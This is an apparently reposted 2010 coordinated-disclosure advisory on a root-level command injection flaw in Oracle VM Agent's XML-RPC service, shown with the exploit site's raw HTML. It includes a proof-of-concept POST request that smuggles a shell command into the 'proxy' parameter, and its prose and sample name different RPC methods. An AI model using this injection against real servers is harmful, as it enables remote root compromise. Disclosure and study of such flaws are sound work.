[remote exploits] - Oracle Virtual Server Agent Command Inje
Posted on 13 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Oracle Virtual Server Agent Command Injection | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Oracle Virtual Server Agent Command Injection by Nahuel Grisolia in remote exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>============================================= Oracle Virtual Server Agent Command Injection ============================================= 1. Advisory Information Advisory ID: BONSAI-2010-0109 Date published: 2010-10-13 Vendors contacted: Oracle Release mode: Coordinated release 2. Vulnerability Information Class: Injection Remotely Exploitable: Yes Locally Exploitable: Yes 3. Software Description Oracle VM is server virtualization software which fully supports both Oracle and non-Oracle applications. Oracle VM offers scalable, low-cost server virtualization that is three times more efficient than existing server virtualization products from other vendors. Oracle has also announced certification of key Oracle products including Oracle Database, Oracle Fusion Middleware, Oracle Applications, and Oracle Real Application Clusters with Oracle VM. Oracle VM Manager communicates with Oracle VM Agent to create and manage guests on an Oracle VM Server. Oracle VM Agent is installed and configured during the installation of Oracle VM Server. By default, Oracle VM Agent is executed, with a highly privileged user, typically root. 4. Vulnerability Description Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. 5. Vulnerable packages We ran our tests using Oracle Virtual Server release 2.2.0 with Oracle VM Agent 2.3. 6. Non-vulnerable packages Patch set 2.2.1 and above 7. Credits This vulnerability was discovered by Nahuel Grisolia ( nahuel -at- bonsai-sec.com ). 8. Technical Description 8.1. OS Command Injection CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C) Oracle VS Agent is prone to a remote command execution vulnerability because the software fails to adequately sanitize user-supplied input. Oracle VS Agent exposes through XML-RPC several functions. One of these functions is validate_master_ip, which receives four parameters. The second parameter "proxy", is vulnerable to command injection, because it is not properly sanitized and its content is concatenated in an operative system command, executed as a highly privileged user (typically root). The following POST message can be sent to the VM Agent XML-RPC port. By doing this, the ping command is executed as follows: POST /RPC2 HTTP/1.0 User-Agent: XML-RPC for PHP 3.0.0.beta authorization: Basic XXXXXXXXXXXXXXX Host: XXX.XXX.XXX.XXX:8899 Accept-Encoding: gzip, deflate Accept-Charset: UTF-8,ISO-8859-1,US-ASCII Content-Type: text/xml Content-Length: 416 <?xml version="1.0"?> <methodCall> <methodName>utl_test_url</methodName> <params> <param> <value><string>http://192.168.1.101</string></value> </param> <param> <value><string>192.168.1.103'; ping –c 10 localhost; '</string></value> </param> <param> <value><string>192.168.1.101</string></value> </param> <param> <value><string>192.168.1.101</string></value> </param> </params> </methodCall> 9. Report Timeline 2010-09-24 / Bonsai provides vulnerability information to ORACLE 2010-09-29 / Oracle confirms the vulnerability 2010-10-12 / Oracle published Critical Patch Update Fix 2010-10-13 / Public Disclosure # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-13]</pre></body></html>
